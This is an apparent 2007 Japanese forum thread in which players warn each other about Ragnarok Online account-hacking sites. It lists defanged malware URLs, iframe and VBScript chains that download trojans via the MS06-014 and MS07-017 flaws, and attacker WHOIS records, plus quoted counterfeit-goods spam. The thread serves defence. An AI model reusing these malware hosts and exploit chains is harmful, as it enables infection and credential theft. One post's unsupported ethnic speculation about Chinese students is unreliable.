今朝「売り装備」って看板の典型的なアカハック露店を発見。
まだまだ引っかかる人はいますね。月に2,3回は見かけます。
皆様も注意されたし。

ってココ見てるような人はたいがい注意はしてるんでしょうけど。
問題はココ見ない関心薄い人ですね
とりあえずギルメンには注意しとくか・・・。

151 名前:(^ー^*)ノ〜さん :07/05/04 10:51 ID:k3sBdZKX0
Posted by ダーツ五郎 2007年05月03日 21:06
神器材料買取してます、何かあればお声をおかけください。
白ポ?青ポ?白スリム?塩酸?火炎瓶は販売の他、材料との交換も行ってます。
販売価格及び交換比率は各自お問い合わせください。
その他応相談 ※身内特典あり(詳しくは本人まで)
http://www■southbound-inc■com/index■asp
------------------------------------------------

相変わらずこの旅行代理店はなにもしてないのかなぁー・・・
貼られてたよ;;

152 名前:151:07/05/04 11:14 ID:k3sBdZKX0
ソースチェッカーのキャッシュクリアしてからソース調べてみたけど、
何も怪しい点はなかったんだ。
で、何もしてないのに貼っていくのは不思議なのでもう一度キャッシュクリアして検索したら
今まさに現行で改ざん中^^;

153 名前:151:07/05/04 13:08 ID:k3sBdZKX0
連投ごめん。
改ざん結果を見に行ったのですが、気が付いたらしく修正されてました。
さすがに過去にやられていたから何らかの処置をしていたようですね。
しかしハッカーに狙われて、またクラックされてましたから
この旅行代理店は危険IPのままで良いでしょうね。

154 名前:(^ー^*)ノ〜さん:07/05/04 13:37 ID:euXhnIPE0
どっかの掲示板より

AAA級 ヴィトン、シャネル、グッチ、高級腕時計
--------------------------------------------------------------------------------
在庫処分価格なのでヴィトン、エルメス、グッチ、シャネルなどが激安です。当店の主要な経営のブランド:Louis Vuitton(ヴィトン ) C.Dior(ディオール)Chanel(シャネル) Gucci(グッチ) Coach(コーチ) Rolex(ロレックス)AAA級,,S級 ヴィトン、シャネル、グッチ、財布、バッグ。高級腕時計ROLEX 、OMEGA 、CARTIER 、 BVLGARI.興味あれば、是非ご覧下さい
www■jpxpie6-7net■com/web/read_cgi/ ご覧下さい
商品の数量は多い、品質はよい、価格は低い、現物写真!当店の商品は特恵を与える。等の新作から型落までが2000〜8000程度(>_<。)店舗運営責任者 中国問屋 (lvgood)
★☆★━━━━━━━━━━━━━━★☆★
■URL:www■jpxpie6-7net■com/web/read_cgi/
■店長:玲木辰美
■連絡先:lysh830525@yahoo.co.jp />
★☆★━━━━━━━━━━━━━━★☆★

155 名前:(^ー^*)ノ〜さん:07/05/04 13:48 ID:euXhnIPE0
spamというか、垢ハックアドレス収集場所になってしまっているROSVのBBSより

↓垢ハックと思われるアドレス
http://bqdr■blog98■fc2■com
http://urpoka■blog75■fc2■com/
http://www■blog-livedoor■net/game/
http://www■cityblog-fc2web■com/boss/
http://www■d-jamesinfo■com/blog/
http://www■dtg-gamania■com/rormtga/
http://www■game62chjp■net/test/1087006635/
http://www■game-fc2blog■com/chaos
http://www■gameurdr■com/rormtga/
http://www■getamped-garm■com/chaos/
http://www■gsisdokf■net/online/
http://www■k5dionne■com/bbs
http://www■kotonohax■com/blog/nc■htm
http://www■livedoor-game■com/bbs
http://www■omakase-net■com/minamiblog/index■html
http://www■playsese■com/bbs/
http://www■ragnarokonline1■com/ro■htm
http://www■ro-bot■net/10657/
http://www■shoopivdoor■com/fczdun
http://www■southbound-inc■com/index■asp
http://www■ywdgigkb-jp■com/online/

↓RMTの宣伝か、垢ハックか、中を見てないので不明のもの
http://www■rmt-trade■com

↓18禁サイトのspamぽいもの↓
http://www■18girl-av■com/bbs/

156 名前:(^ー^*)ノ〜さん:07/05/04 14:02 ID:euXhnIPE0
既に閉鎖しているイベントのBBSも垢ハックアドレスほいほいになってました。
笑った書込みだけ1つ引用し、あとはアドレスだけ。
垢ハック業者が文面では警戒を呼び掛けてるw

↓投稿されていた内容
−−−−−
それ、中国人組織のトロイの木馬トラップ!
内容 リネージュのアカウントを狙ってキー炉がーなどのハッキングツールを仕込もうと
投稿規制されていない国内掲示板を無差別攻撃中。
海外からの投稿拒否しても問題ないならさっさと対策しないと何度でも
鼠のように来ちゃいますよ。
鼠は餌場を覚えると何度でも来るようになってしまいます。

手口はこちらで、ページ全体にも目を通しましょう。

対策方法
http://www■ragnarokonline1■com/ro■htm

↓その他の垢ハックと思われるアドレス
http://www■rokonline-jp■com/blog
http://www■southbound-inc■com/images/pricejtopro■gif
http://www■conecojp■net/online/
http://www■yahoo-gamebbs■com/8784541/
http://www■k5dionne■com/sanbbs
http://www■fcty-net■com
http://www■good1688■com/info/ro■htm
http://www■netgamelivedoor■com/online/
http://www■lingamesjp■com/bbs/index■htm

157 名前:(^ー^*)ノ〜さん:07/05/04 14:51 ID:wiHdnmHp0
southbound-incはおそらく個人経営に近いような物なんだろうな。
んで、サイトは「株式会社てくのろ」とやらに丸投げしてるんじゃないかな。

脱力したのがこのページ(Last-Modifiedが2002年だけど)
www■tekunoro■co■jp/works.html
セキュリティ雑誌に連載してたらしい。

158 名前:(^ー^*)ノ〜さん:07/05/04 15:05 ID:fh+thd8H0
余計なサービスもセットで付いてくる、win2k上のIIS5で運用しているくらいだからな……
まともなセキュリティメンテナンスが行われないまま、連中のターゲットにされているのだろう。

この手のタケノコIT屋なんて、人員の定着性が悪いから、構築した人間が残っていなければ、まともな
ドキュメントも用意してないことなんて珍しくないのがまたなんとも。

159 名前:(^ー^*)ノ〜さん:07/05/04 15:16 ID:hJ+whqYS0
>>156
それしってる、リンクだけウィルスに書き換えたパクリね。
連中の攻撃文書のテンプレになってるみたいだね。
それの原文のリンクはリネージュ資料室だったり。

長文+リンクは悪用されやすいと言う典型的なものだね。

160 名前:(^ー^*)ノ〜さん:07/05/05 04:19 ID:UUFz724k0
>>151-153
zhangweijpは未だ健在に見えます。
前に書きましたように、/ と /index.asp は別物です。
アカハックが埋め込まれているのは /index.aspの方。

>>155
18girl-avは既知のアカハックドメインです。

>>156
lingamesjp が ここでは未出ドメインかな。
-> jprmthome

>>157
サウスバウンドの会社 (株式会社アティックツアーズ) あてにメール入れても
無反応だったので、今度は てくのろのほうに対応依頼かけてみました。
# 無駄だと思いますが。


----
PukiWikiのcvsにあるブロック定義ファイルの spam.ini.phpは
随時更新されており、ここで出てきたアカハックドメインも
それなりに間は空きますが取り込まれています。

161 名前:(^ー^*)ノ〜さん:07/05/05 06:57 ID:MnCVoQD90
FKCfb-05p1-157.ppp11.odn.ad.jp
からのアカハックアドレス書込を捕捉したので報告。
書き込まれたアドレスは既出の危険なドメイン名を含む
http://www■fcty-net■com

上記アドレスにアクセスすると
http://www■good1688■com/info/cezhi
を呼び出す。そこでVBScriptが実行され
 http://www■good1688■com/info/cezhi/ro■exe
 http://www■good1688■com/info/cezhi/t1■exe
 http://www■good1688■com/info/cezhi/msn■exe
が呼び出される。VBScriptは定番の奴。

投稿者のブラウザは
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
と代わり映えしないが、言語が中国語になっていた。

ODNには通報済。
Hostの前の文字列(地域毎に違う筈)が以前と違うから別のUserか?

でもって。書き込みされそうになった投稿内容を見て一寸失笑してしまった。

ROアカウントハック報告スレまとめ?サイトhttp://www■fcty-net■com

有名税?w

162 名前:(^ー^*)ノ〜さん:07/05/05 07:10 ID:FwNviEn20
でも日本語わかる奴(もしくは日本人がつるんでる)が、そこら辺もチェックしてるって事だな。
対策のサイトと言われれば知らない人は踏んでしまうかも知れない。結構騙されやすいきつい手。

163 名前:(^ー^*)ノ〜さん:07/05/05 08:49 ID:nh2+0jmp0
>>162

日本語わかる奴 > まず間違いなく国内滞在者か留学生と言う名の協力者、と。
日本人のつるみは薄いとおもう。
中華なら危険を察したらとっとと本国に戻ればよいのだから。
留学生が突然いなくなる、実は帰国してたなんて事例もよく聞くしね。
華僑ネットワークかなんかで協力者要員をかき集めたんだろうかねぇ。

164 名前:151:07/05/05 09:15 ID:9we1Z3pT0
>>160
お疲れさま。
わたしがソースチェッカーオンラインで調べたときは、
氏が言われる「/index.asp」も「/」もなんら変わりなく同じだった。
で、キャッシュクリアして再検索したら表示が変わり、
あれ?っておもったから念のためまたキャッシュクリアして再検索したら
iframeが増えていったりアラートやらが再検査ごとに増えていって
仕込んでる最中らしかったから2時間後にどうなったか見に行ったのさ。
そしたら改ざん前に戻ってたので気が付いたんだと思ったのですよ。
んで、今見に行ったらまた・・・
完璧に標的にされてるね。てか、この鯖管理者ダメダメだ。

165 名前:にゅぼーん:にゅぼーん
にゅぼーん

166 名前:165:07/05/05 16:21 ID:QdbyhpF/0
画像に関しては、拡張子がjpgかgifのサーバー上に無いファイルを指定した場合、
常に同じ画像を返すよう設定されてるみたいです。
sutete■net/(出鱈目なファイル名).gif で常に同じ画像が返ってきます。
(というわけで拡張子違いだから、怪しいということなさそうです)

とは言っても、高速道路?の画像を返す意図が良く分かりませんが・・・

167 名前:(^ー^*)ノ〜さん:07/05/05 18:11 ID:yuJmgpX10
sutete■net と zn360■com、前者は日本で、
後者はアメリカで取得したドメインだけど
IP同じだし、表示されるコンテンツも同じ。
同じレンサバ業者のデフォルトページなんじゃねーの?
(nuseek■comでの広告クリックによる小遣い稼ぎ?)
借りた奴がまだコンテンツ置いてないのか撤退したのか
下のディレクトリに罠仕込んであるのかは知らんけど、
調べようがないからドメインだけじゃなくフルパスで書いてくれ。

168 名前:(^ー^*)ノ〜さん:07/05/05 18:11 ID:9we1Z3pT0
>>165
サイドメニューがすべてトロイURLへのリンクになってるじゃねーか^^;
TOPに戻ろうとしてうっかり間違って踏んじゃったよorz
おまえは垢ハクIPを知らせたいのか、被害者増やしたいのかどっちだよ。
てか、新手の垢ハク誘導かよ!
バックアップから直しておいたが、
そういったIP知らせにくるんだったらついでに直しておけアホタレ!
まぁ、俺も間抜けだったが。

sutete■netのことだが、絵師サイトがツインテールリングなるものに登録していて
リンクをそこに貼っていたんだろうな。
で、そのドメインつかってツインテールリングなるものを作ってた人がサイト閉鎖して
その後誰かがまったく同じアドレスでサイト開いちゃっただけだろ。よくあることだ。
よく理解せずに安全対策だといってPG2導入してまとめてIP弾くからそういうことになる。
もうちょっと勉強しとき。

169 名前:165:07/05/05 19:21 ID:QdbyhpF/0
>>168
ぐは、まじですか・・・・私が調べたときは、サイドメニューは確かに正常だったので、
今日、私がカキコしたのを見て、誰かが編集したということか・・・
なんにしても、すみませんでした。165は削除依頼を出しておきます。

165の1行目のサイトは今現在は危険URLは貼られてないと思いますが、
念のため、これから見に行く人は注意を・・・いや、見に行かないでください。
(自分で貼っといてなんですが・・・・)

それとWikiのアドレスはここには貼らない方が良いということになりそうです。
どうしてもな場合は.を■にした上、「Wikiなので危険です。閲覧は十分注意して!!」
などのように、危険であることをアピールした方が良いかな。

>>167
まず画像の方が sutete■net/twintail/ban_twintail■gif
そして、その画像に張られているリンクが sutete■net/twintail/twintail■html
出鱈目なファイル名を打ち込んでも、同じ内容が表示されることから、
どちらもサーバー上にはすでに無いファイルだと思います。

これは私の予想ですが、リネージュ資料室の管理人さんが、
そのIPを危険リストに登録した段階では、なんらかの危険なコンテンツが、
そのサーバー上のどこかに存在していたんだと思います。
そして、それは現在も存在するのかもしれないけど、
パスが分からないから、確認しようがないです。

IP単位でブロックするから、関係ない他のコンテンツ(今回が多分それ)も
ブロックされてしまったということなのでしょう。

ということを165を書いた時点では、頭が回ってなかったので申し訳ない。
なんにしても削除依頼を出しておきます。ご迷惑をおかけしました。

170 名前:(^ー^*)ノ〜さん:07/05/05 19:43 ID:9we1Z3pT0
こちらこそ自分の間抜けを棚に上げて当たってしまいスマン(汗
で、「サーバー上にはすでに無いファイル」というのは正解でしょう。
試しにそのフルパスや、ドメイン/適当なアドレス/と打っても、
どれも同じ物が返ってきた。
>167氏がいってるように業者のデフォルトページでFA

171 名前:(^ー^*)ノ〜さん:07/05/05 19:50 ID:9we1Z3pT0
southbound-inc■comのようにまたウィルス置かれるかもしれないから
PG2の設定そのままにしておいて弾いていて良いかと。

172 名前:にゅぼーん:にゅぼーん
にゅぼーん

173 名前:(^ー^*)ノ〜さん:07/05/05 20:45 ID:9we1Z3pT0
自前で(無料)BBS用意してきましたよw
----------------------------------------
1. Posted by ダーツ五郎 2007年05月05日 15:16

底部獲得経験値倍率 50倍
工作獲得経験値倍率 50倍
ア本家ROと比較すると
イテムドロップ率 8倍
装備ドロップ率 8倍
カードドロップ率 40倍
最新マップとオリジナルモンスター実装。
オリジナルNPC有り。
ペットボーナス付加有り
タナトス、テコン、忍者、ガンスリンガー実装
生体実験所、氷の洞窟、フレア神殿、
アルナペルツ教国、オーディン神殿、キルハイル等実装
関連サイトを参照して下さい
BBS: http://jbbs■livedoor■jp/game/37818/
http://www■aehatena-jp■com/games
---------------------------------------

下のURLはすでに既出だけど、
ライブドアの無料BBS借りてまで騙そうとしてきてます。
書き込みがコピペであったり、翻訳つかって貼り付けとか
違和感ありすぎww てか色使いがキモすぎです。

ライブドアに削除依頼だしてくる。

174 名前:(^ー^*)ノ〜さん:07/05/05 21:09 ID:avStpz850
昨日の事だけども良いかな
ROと全く関係ない物(地名)をgoogleで検索したら、検索で出た1件目に
「このサイトはコンピュータに損害を与える可能性があります」と付いてたのよ
ソースチェッカーで検索したら
1×1のインラインフレームでttp://quickcnt■com/ld/axhst/に接続、
そこからttp://quickcnt■com/ld/axhst/ani■htmlへの転送があったんだ

検索元のキャッシュを消したらインラインフレームは消えてた上、普通のサイトっぽい
これは中華か何処かにクラッキングされたと考えても良いのかな?
後quickcntは垢ハク(というよりウィルス)のアドレスであってるだろうか

ちなみにその後ani■htmlをチェックしていたら、
ani■html→ani■htmlに飛ばすだけになってから404になった

175 名前:(^ー^*)ノ〜さん:07/05/05 22:00 ID:dhckDsc70
>>172
有名なBOT配布サイトじゃん。
iframeはYahoo!がGeoCitiesに強制で仕込むアクセス解析か何かだろ。
LiveROでやってくれ。

>>174
ググると欧米あたりで「踏んじまった」って書き込みが多いから
日韓のネトゲや中華ハッカーとは関係無いと思われ。
使う脆弱性はやや見飽きたいつものアレだけど
スクリプトは中華に比べてややこしい上に変数にピンインも無い。
銀行系を狙ったロシア製キーロガーかと。
ttp://www.mmobbs.com/uploader/files/2550.png
まーこれもスレ違いだな。

176 名前:(^ー^*)ノ〜さん:07/05/06 01:13 ID:QINfxQwm0
>>175
成る程、すっきりした。Thx

177 名前:(^ー^*)ノ〜さん:07/05/06 12:14 ID:RGLYKS/O0
数ヶ月ぶりにROでもやろうかと思ったが、ここ見てると不安になるな。
何かやばいもの踏んでるかと思うと心配で…
WindowsのUpdateはほぼ欠かさずやってるし、マカフィーやカスペでスキャンしても
怪しいのは見つからなかったが、これって一応は安心と思っていいのかな?
本当なら再インストールが一番なんだろうが、あまりそっち方面の知識がなくてorz

178 名前:(^ー^*)ノ〜さん:07/05/06 12:59 ID:l6kEfcCd0
質問者のPCを直接チェックできないここでは
再インストール以外では安心とは言いきることができない。
それが日々進化している垢ハックの対策のもどかしいところ。

チラシの裏
そのうち再インストールしても生き残るウイルスとか出てきたりして
と、これは妄想

179 名前:(^ー^*)ノ〜さん:07/05/06 13:08 ID:7aDjpiNe0
だいたいフォーマットするのはCだけだし、
ウィルスがそれ以外のドライブに入っていたらwktk

180 名前:(^ー^*)ノ〜さん:07/05/06 13:34 ID:ze5dfF5z0
どんなにウィルスやトロイが進歩したとしても、ロードされなければ一切の活動は不可能。
OS再インストールは、そのロードを断ち切る確実な手段。
問題は、ウィルスがシステム以外の領域に入っていて再度実行してしまった時。
あからさまな物ならアンチウィルスソフトが反応するとは思うが、抜けてしまったらアウト。
ここで語られているようなスクリプトで罠を仕込むタイプならその心配はないが。

181 名前:(^ー^*)ノ〜さん:07/05/06 14:48 ID:Z8b4JEsv0
ただROやリネをやめた所で、この手のトロイを踏まなくなるわけじゃない。
サイトハックさえやる連中で、どこに行っても危険は付きまとう。

そして感染した所でROやリネやってないから、なんて発言は免罪符にならない。
踏んでしまった場合、ハク犯が別種の情報を抜こうとして別のタイプのトロイを
仕掛けてたら踏んでるという事だし。
インターネットを利用してる以上、危険性はどれも同じで危機意識はROやリネとは
関係なく、同じように持つ必要がある。

>178
仮に質問者のPCを直接チェック出来たとしても、同じ事だけどね。
ウィルスが発見されないというのは見付ける事が出来なかっただけ。
検出漏れが絶対にないとは言い切れないし、結局「多分安全」としか言えない。

182 名前:(^ー^*)ノ〜さん:07/05/06 15:20 ID:z9l6pQSN0
パスワードを抜き取るタイプのウイルスに限定した話になるけど、
ウイルスの進入を確実に防ぐ方法がない以上、
最初から抜かれても大丈夫なシステムにすることが重要だと思う。

一部の銀行で使われてるトークンを使ったワンタイムパスワードなんかは
一つの答えではないかと思ってる。

盗んだパスワードが、再利用不可能なものであれば、盗む意味がなくなる。
パスワードを1分以内に利用されたり、セッションハイジャックされたら
終わりだから、完全ではないと言われているけど、例えば土日や時間外に
振り込み予約をすれば、パスを奪われても即振込みなどできないので、
事実上の完全防御ができる。(トークンを物理的に盗まれない限り)

オンラインゲームで言えば、ログイン後1分以内にログインされるということは
正規ユーザーのログイン中にログインすることになり、ハックの事実が一発で発覚する。
あとはいわゆるログイン合戦にならぬよう、アカウントロック用のパスワードを別途容易すればOK。

このようなシステムを今現在組めと言われても無理かもしれないが、
将来的には、お手軽に組める時代が来るかもしれない。
いや、そういう風になっていかないとダメだろう。

183 名前:(^ー^*)ノ〜さん:07/05/06 15:47 ID:KPTtIDk/0
ttp://www■din-or■com/bbs
ここはアカウントハックサイトなんでしょうか?生体萌えスレwikiにあったのですが・・・

184 名前:(^ー^*)ノ〜さん:07/05/06 15:48 ID:bU+JZZBn0
ttp://www8.atwiki.jp/rmt_sagi_wiki/pages/110.html
だれかチェックおねがい。

185 名前:(^ー^*)ノ〜さん:07/05/06 15:50 ID:lXiyJ4YG0
>>1
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

186 名前:(^ー^*)ノ〜さん:07/05/06 15:54 ID:JJz3pb7x0
あと>>3
(垢ハックもしくはその疑いのあるURLは)
 .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)

187 名前:(^ー^*)ノ〜さん:07/05/06 16:07 ID:OWgY0C2t0
>>183
危険なのでとりあえず答えだけ書いておけば紛れも無くアカハック。既に誰か治してくれたようだが。

>>184
URLからして踏む気もおきない。そういうスレではないのでチェックする気もない。

188 名前:(^ー^*)ノ〜さん:07/05/06 16:12 ID:Z8b4JEsv0
>183
YES
既知の罠サイトです。

>184
URLの通りRMTで詐欺やってる集団の晒しWikiらしいが
そんなURLに縁がある時点で、どうかと思うがね……

振込先の銀行口座やら載ってるので、いろんな意味で削除依頼してら。

189 名前:(^ー^*)ノ〜さん:07/05/06 16:41 ID:Z8b4JEsv0
ちょっと早いが、次スレのテンプレ追加案

-------------------------------------------------
【怪しいアドレスを見付けた時には】
既知の危険アドレスかどうかは次の方法で確認が出来ます。

・ソースチェッカーオンラインで調べる
 ttp://so.7walker.net/guide.php
   <URL:>欄にアドレスを入力してCheckをクリック
   「※このアドレスは危険URLのひとつです。」と赤字で表示された場合
   既知の危険アドレスです。

・まとめサイト・リネージュ資料室の危険ホスト名一覧で調べる
 まとめサイト:ttp://sky.geocities.jp/vs_ro_hack/hosts.htm
 リネージュ資料室:ttp://lineage.nyx.bne.jp/misc/security/?id=url-site
   Ctrl+Fでドメイン名を検索して見つかった場合、危険アドレスです。
   (検索する場合はドメイン名(○○.com等)で検索)

※これらで見つからなかった場合でも、新しい罠アドレスの可能性もあります。
  完全に無害とは限らないので注意してください。
※もし危険アドレスを踏んだ場合は>5を読んでウィルスの駆除及びパスワードの
  変更を行ってください。
-------------------------------------------------

自分はhosts更新スクリプトから危険ホスト名一覧をファイルに落として、それで
検索するようにしてる。
まとめサイトとリネ資料室の内容を合わせた状態でファイル化してくれてるので
簡易DBとして使えて便利。

190 名前:(^ー^*)ノ〜さん:07/05/06 17:06 ID:Ve0nXWSX0
(生体萌えスレWiki関連)

>>187
16時50分頃に私が確認したときは MenuBarとトップページが汚染状態。
気づいた時点でバックアップで巻き戻しちゃったので、
再改変か修正漏れかは不明。

最新のn件が 改変検出のあてにならない設定なので要注意。

191 名前:(^ー^*)ノ〜さん:07/05/06 19:26 ID:OWgY0C2t0
>>190
先ほど、タイムスタンプは管理人専用に変更なさってくれたようです。
ありがたい事です。

192 名前:(^ー^*)ノ〜さん:07/05/06 22:27 ID:0Uc+z0Ln0
http://www■ragcans■com/kako2/1108350472■html

ここ大丈夫か教えていただけるとありがたいすorz

193 名前:(^ー^*)ノ〜さん:07/05/06 22:28 ID:mIpnHg2J0
このスレは『勇気が無くて見れないサイト解説スレ』ではありません

何度言えば…

194 名前:(^ー^*)ノ〜さん:07/05/06 22:29 ID:0mwvKfSM0
サクッとIDあぼーん

195 名前:(^ー^*)ノ〜さん:07/05/06 22:33 ID:8svRuAMj0
毎度おなじみ福建人組織の新ドメイン、今度の登録地は福建省アモイだ。
www■twurbbs■com/

IFRAME
www■gamanir■com/exe/wm■htm

これが呼び出される。
6日22時20分時点のVIRUSTOTALではカスペ系、シマンテックを回避している。
NOD32、マカフィーは検知。
www■gamanir■com/exe/lineage■exe


登録情報、後者のなんちゃってガマニアことガマニルは相当に寝かせてたものだね。
今だ気づかれていない寝かせドメインがまだ相当数あると思われる。
Domain Name ..................... twurbbs■com
Registrant ID ................... hc826666280-cn
Registrant Name ................. mingzhong ni
Registrant Organization ......... mingzhong ni
Registrant Address .............. haichangchanglinload no67
Registrant City ................. xiamen (アモイ市)
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000  (郵便番号だけ四川省成都市)
Registrant Country Code ......... CN
Expiration Date ................. 2008-05-04 13:53:28


Domain Name:gamanir■com
Registrant:
yangjianhe
longyan
361000

Administrative Contact:
yangjianhe
yangjianhe
longyan
fujian Fujian
CN
Registration Date: 2006-01-03
Expiration Date: 2008-01-03

196 名前:(^ー^*)ノ〜さん:07/05/07 01:50 ID:9tJJDyrB0

【  アドレス   】 http://www6■atwiki■jp/battleroyale/pages/568■html
【気付いた日時】 5/7 00:10
【     OS    】 xp sp2
【使用ブラウザ 】 Firefox 2.0.0.3
【WindowsUpdateの有無】 4月中旬
【 アンチウイルスソフト 】 カスペルスキー
【その他のSecurty対策 】 無し
【 ウイルススキャン結果】 カスペルで主管したが、とりあえず、感染なし
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
バトルROワギャラリーからの各リンクが全て、
http://www■aaa-livedoor■net/ro-navi/ になっていた。

ネットラジオでバトルROワの事で盛り上がっていて、
その関連で、画像を検索していたら、
踏んでしまった。

ネットラジオ関係者も踏んでしまってる模様。
とりあえず、向こうにも報告はしてます。

wikiの方は、修正済み。

197 名前:(^ー^*)ノ〜さん:07/05/07 01:58 ID:zzPGfmgp0
>>195
台湾Gamaniaのパス抜きの模様。
>>45 の後半のlovejpjpと同一犯(IPも2つ違い)。
yzlove■comという台湾の出会い系(?)サイトを丁寧に丸パクリしたり
PackerがPEC2だったりと、いつもの日本向けMaran爆撃部隊とは
微妙に芸風が異なる。台湾ってことでトレンドマイクロには発射しました。

198 名前:(^ー^*)ノ〜さん:07/05/07 03:24 ID:g61EFIrZ0
http://www■mbspro6uic■com/mbsplink
当方のブログに中国のIPからのコメントに付いてたURLで、
内容は確認してませんがコメントの投稿者名、投稿内容は
ある掲示板からのコピペでしたのでアカハックと思われます。

既出かもしれないけど気にせず投稿

199 名前:(^ー^*)ノ〜さん:07/05/07 03:29 ID:puat0h9C0
あこすれてんぷら(本家)で5/1あたりにアカハックアドレスへ誘導する
改竄がされてたので報告。

リンク先は www■biglobe-ne■com/bbs 。
ただ書式を間違ってて、変な状態だったけど。

さらにリンクは無かったけど「転生オーラ名簿」なるページも出来てました。
-------------------------------
[[LordKnight (21)>http://www■biglobe-ne■com/bbs]]
[[Sniper (4)>http://www■biglobe-ne■com/bbs]]

以下転生職がずらり。

わざわざ手打ちで書いたんだろうか?
その割にはページに対するリンクが無いし、良く分からん……

一週間近く報告が無かったので、誰も見なかった(踏まなかった)と思いたい所。

200 名前:(^ー^*)ノ〜さん:07/05/07 03:35 ID:eQiLtPl80
旧アコプリテンプレのURLもう消しちゃったので見れないのだが、TOPにデッカデカと
現在、こちらのwikiはアカハック改竄が多発している為、アコプリテンプレは避難所に移動しています。
アカハックURL対策の為に、新URLはにゅ缶のアコプリスレのテンプレートから飛ばれると安全です。
てな感じの事を書いておけばそうそう踏まないんじゃなかろうか。

内容はたぶんテンプレ的なものが用意してあってそこからコピペしているか、
スクリプト的なもので自動に巡回してかましているんじゃないかね。

201 名前:(^ー^*)ノ〜さん:07/05/07 03:41 ID:puat0h9C0
>198
リネージュ資料室に載ってる危険URLの1つ。
ソースチェッカーで見ると、MDACの脆弱性(xiaogui.exe)と
aniカーソルの脆弱性(mbsp.cur)を使った罠に見えた。

ROに関係するかどうかは不明だけど、そのアドレスはこのスレでは
初出じゃないかな。
そのため、まとめサイトさんの所には載ってないので要注意。

>200
避難所が出来た時点で、本家テンプレのTOPには誘導が書かれてて
今はWikiの内容はほぼ全て削除されてるから、まず平気と思われ。

ただクリック一発で飛んでしまうため、間違えて見に行った人が
被害に遭う可能性は否定できない。
管理人が多忙でページの凍結も出来ないようだし、避難所がある
今でも結構怖い状態ではある。

202 名前:198:07/05/07 03:53 ID:g61EFIrZ0
>>201
ご丁寧な解説thx。すごいスッキリした

203 名前:(^ー^*)ノ〜さん:07/05/07 07:05 ID:qYjpc2WF0
>>198,201
もちっと詳しく調べてみた。

www■mbspro6uic■com/mbsplink/
MS06-014脆弱性があるかどうかを調べ、ある場合はmbsp■htmを、ない場合はmbsp■curを使う。
最近このチェックが入ってるパターンを良く見かける。

www■mbspro6uic■com/mbsplink/mbsp■htm
いつものパターンのVBScript。MS06-014脆弱性利用。xiaogui■exeをダウンロード。

www■mbspro6uic■com/mbsplink/mbsp■cur
アニメーションカーソル。MS07-017脆弱性利用。xiaogui■exeをダウンロード。
カスペでのウイルス名Exploit.Win32.IMG-ANI.ac
他のアンチウイルスソフトでも検出率は良好。

www■mbspro6uic■com/mbsplink/xiaogui■exe
UPack maran。カスペでのウイルス名Trojan-PSW.Win32.Maran.ei
他のアンチウイルスソフトでも検出率は良好。

204 名前:(^ー^*)ノ〜さん:07/05/07 09:50 ID:jZWC5kVN0
旧アコプリWikiの件は、避難所への移行がほぼ完了してる証でもあるだろうね。
でなければ1週間近くも放置されてないだろうし。

ただ逆に言えば、目が行き届かなくなって危険度が増す恐れもあるんだよな。
ググったらさらに前身と思われるWikiも引っかかるし、ちょっと危険。

旧アコプリWikiに限らないが、元々閲覧者が多く現在放置状態のサイトがあるなら
それらは一括して危険ホスト扱いにした方が安全かも。
職Wikiなんかだと何度か移転してる事もあるし、紛らわしさと潜在的な危険を防ぐ
目的で、hostsに登録した方がいいような気がする。

205 名前:(^ー^*)ノ〜さん:07/05/07 09:57 ID:xkKA/A+Z0
移転とかするなら移転先URL表示にだけして凍結しておけよと。
垢ハック仕込まれて感染者が出たら
それはそのサイトの管理者の責任になるからな。

管理人がアホだとパスなくしたりそのまま放置したりで
周りの人間に迷惑がかかる。

206 名前:(^ー^*)ノ〜さん:07/05/07 10:08 ID:ToDhrV090
放置されてるからこそ避難というか移転したところも多いんだろう

207 名前:(^ー^*)ノ〜さん:07/05/07 10:13 ID:0f+aBfY60
Google から消すには
ttp://www.google.co.jp/intl/ja/remove.html
を見れば判るけど管理人しかできないんだな

閉鎖するにも放置ではなく安全にしていく必要が出てきたみたいだな。

208 名前:(^ー^*)ノ〜さん:07/05/07 14:26 ID:DHREqoVF0
管理人も長いこと着手していない事が判明した場合、wiki spam的手法では済まなくなる恐れがある。
PHPの脆弱性を攻撃されたり、管理者アカウントそのものがブルートフォースの対象になったり。
そして、サイトそのものが制御を奪われ、垢ハックどころか、サイバー攻撃の道具として転用されるかも知れない。

必要の無いサービスは立ち上げない、使われていないwebサービスをいつまでも放置しておかない。
レンタルサービスの場合も、したらばBBSのような生存確認が今後必須になってくるかも。

209 名前:(^ー^*)ノ〜さん:07/05/07 18:02 ID:qYjpc2WF0
閲覧者側で防御しようと思ったら、やはりhostsとPG2に登録するのが一番だろうね。
可能であれば、まとめサイトの管理人さんに協力してもらって、
従来の危険リストとは別に、準危険リストみたいな感じで
罠そのものが置かれてるサイトではなく、踏み台にされているサイト集みたいな
リストを別途作ってもらって、それをhostsとPG2に登録するみたいな。
例の旅行会社なんかも、どちらかというと準危険リストに分類されると思う。

210 名前:209:07/05/07 18:07 ID:qYjpc2WF0
良く考えたら、踏み台にされてるサイトに、直接罠が置かれる可能性もあるから、定義変更。

危険リスト=アカウントハッカーが直接所持してると思われるサイト
準危険リスト=踏み台にされているサイト

211 名前:(^ー^*)ノ〜さん:07/05/07 20:48 ID:puat0h9C0
踏み台にされてたら、それは危険リスト入りだと思うが。
放置・廃棄されてそのままのWikiやらBBSやら、悪用されやすい
サイトをまとめたものを準危険リストと呼ぶなら、まだ判るけど。

一覧化するのは悪用される恐れもあるが、そもそもどれだけの数が
あるのか判らない。
移転した職Wikiにしても、元サイトが今どうなってるかを把握してる人は
居ないだろうし。

取りあえずセキュスレの方で思いつくサイトを列記していけば
一覧化が必要かどうか判るんじゃない?

212 名前:(^ー^*)ノ〜さん:07/05/07 21:22 ID:j9rzjnUD0
黒と灰色の線引きは自分でやれ、と言うしか。
価格comやVectorやITMediaやASUSやZalmanにトロイが仕掛けられたからといって
こいつら全部危険リスト入りにするといろいろ支障をきたす人もいるだろうし
んじゃ誰が危険じゃなくなったことを確認すんの? てことにもなるし。

213 名前:(^ー^*)ノ〜さん:07/05/07 21:43 ID:puat0h9C0
>212
それもそうだねぇ。
必要分だけ個別にとなると、結局各自が処理するしかないし。

ところで>195のは、カスペで Trojan-PSW.Win32.Magania.py として検出された。
朝には対応してた模様。
てか、仕事が早い……

